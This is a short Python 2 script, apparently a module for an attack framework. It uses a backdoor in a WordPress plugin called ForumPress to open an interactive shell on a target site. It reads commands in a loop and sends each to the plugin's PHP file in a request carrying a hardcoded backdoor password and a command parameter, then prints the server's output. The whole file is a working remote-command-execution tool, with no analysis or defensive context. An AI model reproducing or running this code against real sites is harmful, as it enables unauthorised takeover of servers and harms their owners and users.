Description = 'SingleBlows partner once backdoored gain shell'
from plugin_support import *
import requests, time

def main():
	try:
		before_execute()
		text("Connecting to target")
		time.sleep(2)
		text("Generating direct shell")
		time.sleep(0.7)
		print ""
		while True:
			cmd = raw_input("shell# ")
			target = "http://" + ask.target + "/wp-content/plugins/ForumPress/forum_press.php?passwd=qgAZ9xWxTsmGX5mgnbTHyzdf5oSbwzRhVB4LL7d29RSb4MqXRdbSWEoCvaTn&c=" + cmd
			if cmd == "exit":
				exit()
			else:
				r = requests.post(target)
				print r.content
	except KeyboardInterrupt:
		exit()
main()
